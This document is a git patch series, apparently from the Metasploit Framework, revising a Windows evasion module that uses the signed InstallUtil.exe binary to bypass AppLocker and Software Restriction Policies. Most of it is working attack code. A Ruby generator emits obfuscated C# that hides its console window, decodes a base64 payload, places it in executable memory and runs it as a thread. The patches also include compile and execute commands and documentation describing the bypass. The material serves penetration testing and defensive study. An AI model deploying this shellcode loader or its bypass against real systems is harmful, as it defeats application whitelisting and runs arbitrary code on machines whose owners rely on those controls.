'Applocker Evasion - .NET Framework Installation Utility', + 'Description' => %( + This module will assist you in evading Microsoft Windows + Applocker and Software Restriction Policies. + This technique utilises the Microsoft signed binary + InstallUtil.exe to execute user supplied code. + ), + 'Author' => + [ + 'Nick Tyrer <@NickTyrer>', # module development + 'Casey Smith' # install_util bypass research + ], + 'License' => 'MSF_LICENSE', + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Microsoft Windows', {}]], + 'References' => [['URL', 'https://attack.mitre.org/techniques/T1118/']] + ) + ) - register_options([ - OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt']) - ]) + register_options( + [ + OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt']) + ] + ) end - def build_payload - esc = Rex::Text.encode_base64(payload.encoded) + Rex::Text.encode_base64(payload.encoded) end - def instructions print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' else print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' end end - - def mod(var) - var = Rex::Text.rand_text_alpha (8) + def obfu + Rex::Text.rand_text_alpha 8 end - def install_util esc = build_payload - moda, modb, modc, modd, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) + mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu] <<~HEREDOC - using System; - namespace #{Rex::Text.rand_text_alpha 3} - { - public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } } - [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer - { - private static Int32 #{modh}=0x1000; - private static IntPtr #{modi}=(IntPtr)0x40; - private static UInt32 #{modj} = 0xFFFFFFFF; - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); - [System.Runtime.InteropServices.DllImport("kernel32")] - private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); - [System.Runtime.InteropServices.DllImport("user32.dll")] - static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow); - [System.Runtime.InteropServices.DllImport("Kernel32")] - private static extern IntPtr GetConsoleWindow(); - const int #{modf} = 0; - public override void Uninstall(System.Collections.IDictionary s) - { - IntPtr #{modg}; - #{modg} = GetConsoleWindow(); - ShowWindow(#{modg}, #{modf}); - string #{moda} = "#{esc}"; - byte[] #{modb} = Convert.FromBase64String(#{moda}); - byte[] #{modc} = #{modb}; - IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi}); - System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); - IntPtr #{mode} = IntPtr.Zero; - WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj}); - } - } - } + using System; + namespace #{mod[12]} + { + public class #{mod[11]} { public static void Main() { } } + [System.ComponentModel.RunInstaller(true)] + public class #{mod[10]} : System.Configuration.Install.Installer + { + private static Int32 #{mod[0]}=0x1000; + private static IntPtr #{mod[1]}=(IntPtr)0x40; + private static UInt32 #{mod[2]} = 0xFFFFFFFF; + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + [System.Runtime.InteropServices.DllImport("user32.dll")] + static extern bool ShowWindow(IntPtr #{mod[3]}, int nCmdShow); + [System.Runtime.InteropServices.DllImport("Kernel32")] + private static extern IntPtr GetConsoleWindow(); + const int #{mod[4]} = 0; + public override void Uninstall(System.Collections.IDictionary s) + { + IntPtr #{mod[3]}; + #{mod[3]} = GetConsoleWindow(); + ShowWindow(#{mod[3]}, #{mod[4]}); + string #{mod[5]} = "#{esc}"; + byte[] #{mod[6]} = Convert.FromBase64String(#{mod[5]}); + byte[] #{mod[7]} = #{mod[6]}; + IntPtr #{mod[8]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[7]}.Length, #{mod[0]}, #{mod[1]}); + System.Runtime.InteropServices.Marshal.Copy(#{mod[7]}, 0, #{mod[8]}, #{mod[7]}.Length); + IntPtr #{mod[9]} = IntPtr.Zero; + WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[8]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[2]}); + } + } + } HEREDOC end - def run file_create(install_util) instructions end - end From b7137ea426f1013be87bb64a71eb9c79aca0c792 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sat, 15 Jun 2019 20:03:17 +0100 Subject: [PATCH 16/18] update module flow --- .../windows/applocker_evasion_install_util.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 7e0eda285161..8198adaf605a 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -40,17 +40,6 @@ def build_payload Rex::Text.encode_base64(payload.encoded) end - def instructions - print_status "Copy #{datastore['FILENAME']} to the target" - if payload.arch.first == ARCH_X86 - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' - else - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' - end - end - def obfu Rex::Text.rand_text_alpha 8 end @@ -98,6 +87,17 @@ def install_util HEREDOC end + def instructions + print_status "Copy #{datastore['FILENAME']} to the target" + if payload.arch.first == ARCH_X86 + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + else + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + end + end + def run file_create(install_util) instructions From 791da38fe43b4c13aff360a901f73fc12be33f4b Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sun, 16 Jun 2019 11:39:03 +0100 Subject: [PATCH 17/18] update instructions --- .../windows/applocker_evasion_install_util.rb | 22 ++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 8198adaf605a..d7aec6add78c 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -87,19 +87,31 @@ def install_util HEREDOC end + def file_format_filename(name = '') + name.empty? ? @fname : @fname = name + end + + def create_files + f1 = datastore['FILENAME'].empty? ? 'install_util.txt' : datastore['FILENAME'] + f1 << '.txt' unless f1.downcase.end_with?('.txt') + file1 = install_util + file_format_filename(f1) + file_create(file1) + end + def instructions print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}" else - print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" - print_status 'Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe' + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:#{datastore['FILENAME'].gsub('.txt', '.exe')} #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U #{datastore['FILENAME'].gsub('.txt', '.exe')}" end end def run - file_create(install_util) + create_files instructions end end From 5a010e14467d25075120ebd95a152eec8a009c7d Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 20 Jun 2019 16:07:25 +0100 Subject: [PATCH 18/18] update documentation --- .../evasion/windows/applocker_evasion_install_util.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index 9c922f9808ae..78edd5d051d7 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -1,13 +1,13 @@ ## Intro -This module is designed to evade solutions such as software restriction policies and Applocker. +This module is designed to evade solutions such as software restriction policies and Applocker. Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. -It enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" -The main vector for this bypass is to use the trusted binary InstallUtil.exe which is located within the trusted Windows directory and also has the ability to execute user supplied code. +Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" +The main vector for this bypass is to use the trusted binary InstallUtil.exe to execute user supplied code as this binary is located within the trusted Windows directory. ## Vulnerable Application -This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active. +This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block InstallUtill.exe or the "Microsoft.Net" directory. ## Options